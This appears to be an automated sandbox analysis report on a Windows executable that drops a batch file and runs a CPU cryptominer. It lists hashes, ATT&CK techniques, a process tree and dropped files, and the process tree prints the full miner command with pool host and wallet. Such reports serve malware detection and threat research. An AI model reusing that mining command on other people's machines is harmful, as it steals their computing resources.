73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
291s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
11-02-2024 13:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2700	b2e.exe
1848	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1848	cpuminer-sse2.exe
1848	cpuminer-sse2.exe
1848	cpuminer-sse2.exe
1848	cpuminer-sse2.exe
1848	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2316-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2316 wrote to memory of 2700	2316	batexe.exe	85
PID 2316 wrote to memory of 2700	2316	batexe.exe	85
PID 2316 wrote to memory of 2700	2316	batexe.exe	85
PID 2700 wrote to memory of 1940	2700	b2e.exe	86
PID 2700 wrote to memory of 1940	2700	b2e.exe	86
PID 2700 wrote to memory of 1940	2700	b2e.exe	86
PID 1940 wrote to memory of 1848	1940	cmd.exe	89
PID 1940 wrote to memory of 1848	1940	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2316
- C:\Users\Admin\AppData\Local\Temp\8400.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8400.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8400.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\914E.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8400.tmp\b2e.exe

Filesize
7.8MB

MD5
2c8f51ab2bd664b6a23a17cd0449d82a

SHA1
5f6c84d67d1e1deb2a0687978187801a7d8375b9

SHA256
0a565d5e13fd6b8641b74b4ab180752c07f82d2363f0c73322346797d8518fc0

SHA512
8ecf885ced00d25fec81760e2fe72b8a3600826630cb16f99c482643ef0a95e4492c81f49ea7d386a27a3a0c589804b42c3fd5a1ff6adcc46e214a95537971bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\8400.tmp\b2e.exe

Filesize
3.5MB

MD5
9c8bc0cbd2b29e8e5bed10117819473d

SHA1
40a14687ebcb2df688c20d1e483d22e1c0a8f96e

SHA256
b090cb90a19c3e3acfa7bdcd6e27827a1d892cf4757ec1a062340704aa43ee11

SHA512
434b8f285808cb2daca507f3bc5139c162eaac43cf8e916ccb3d7c6935ac7e6493aa2131ee739482105814804ec841bfb88c2b76cd9ef831645bc3df1c129426

Download Submit
C:\Users\Admin\AppData\Local\Temp\8400.tmp\b2e.exe

Filesize
5.0MB

MD5
0c809829ee1d2f34da11498eeecffdf1

SHA1
02ea5e522a09f8ee90137209c03689ed361c4e73

SHA256
4367a10c3e3d231bcd37005a1aa0da20f55f1b394010d28995331a37c160ec4c

SHA512
2bfd5532b97ec1a8d44ea8d4bef4f58cd65c4a16700c77f92d202110871da75ca8fd8fd87eecb83aa2064f761ef098324e6a9e194b0b73f8b772a02bc7813496

Download Submit
C:\Users\Admin\AppData\Local\Temp\914E.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
869KB

MD5
1313dd594cbeeb4f21710386df294e85

SHA1
57eac3b3b999aa03e65141f1b1dffcb5fcbd1c9f

SHA256
eb44e5101a74e90fa552e7832c2da6361a712c7ede063003d459c13319aa6185

SHA512
5afea19eb36c5b41c8e5bb973c78c91200090abcfa29bcea2a84ea0b9e461a8e67f4b6319091b9f933c49f1dfc5253c8f169b4218ba1690168b08e443e2befc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
960KB

MD5
5f088febb9167d9fa27631de416c40d9

SHA1
0e7cfc61e5cd1bb82c846c939d71388e2f9d5086

SHA256
869740b99a3d66f9e9decc133d9c3c4a2c14c3e7c62c512248da76f002387fce

SHA512
65e4cd0d550b852f50e426e53ff47bf1419a5cc1aaf07010b10b96f392148525950fd11dd3b1e8acda0916d288414629cde845cdc959ed7092e565ccb8ffa920

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
34017462c655eaf3f2c9fecb09bea193

SHA1
8dad6c005b5f0f55bae98f078fd4b79a986ec8d8

SHA256
e51f841c3f41c027b0f66a84c851a651a762a16f2fb94c6774baa2a834e7bd72

SHA512
6de25fc39e5aaf5e739fb5ab24782e9a257ed6140df38130e92daf8a09a698aa3d0849d1faa05b318fd73b180c308abbecd5a297a778bed49519e8c6f6696f75

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
869KB

MD5
18d447ba647b585cfa08f9aab5e65317

SHA1
f3eb76e4bff0b92a7d44b859a7174710b54700e6

SHA256
800d73b6c1390382cf0f61dd4c62209c67372ef4f6f5b163166627623e6dd68f

SHA512
2b528b69a42ce30e0d7b558969c5951fa91f663d36f443dac866204441a6b97e27bff7218d1ec916a1098326cc9f49f2c0542d376c41fe840f525e3200c417f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.0MB

MD5
218336e2075f93b652fb58097ee28078

SHA1
ec394a472133a02f3d9d6e2bc295952db51dabba

SHA256
4e554aa5f7f4a9793a0269b11019a1321ca855297117b8a1abedbd321097a97e

SHA512
dbc6f0763c3e724b28d1791249c2ee112ad81c931c3bc6ca957c2285a143f0ecd040c1fa302cf4e28cd89e85098646027df3c74a72f87c344e19510c9425fab8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
5b264940a8fd9320e7dca90339b5c0b3

SHA1
d8bb1d451581c58173fbeca2ddc5bc2658fc8c22

SHA256
6208fe8c445bbc80b1e3c7e12d540ec857495271850fd012b60da635aa420298

SHA512
58e29278a034c4d272744edcafed07c459af9308db754a78125c3456ac625edad7cef4ed39459cae6541b0866b964348afabd1057bebfe0705f0347b5f7fb2f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
832KB

MD5
121d4a9ce60ed6c969c27ce75f8b3dfc

SHA1
9e35c0eabc0d085b6c15de0c43af296622f5993a

SHA256
b100fe3ba04dcdca6bbff314346cadc08d6d1e68f6c6fc4b14b91f3e2da073ba

SHA512
f91f32cfec3769f18a1517c05247b5b20972f79e9c589b4ae83ed7acef879323bdb69f01900f4ed0b018db668719d8cc8322f7e0eb73eefba8f8fdafe2167c19

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1848-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1848-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1848-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1848-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1848-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1848-46-0x000000006F190000-0x000000006F228000-memory.dmp

Filesize
608KB

Download
memory/1848-47-0x00000000010A0000-0x0000000002955000-memory.dmp

Filesize
24.7MB

Download
memory/1848-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1848-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1848-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1848-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1848-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1848-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1848-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2316-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2700-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2700-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download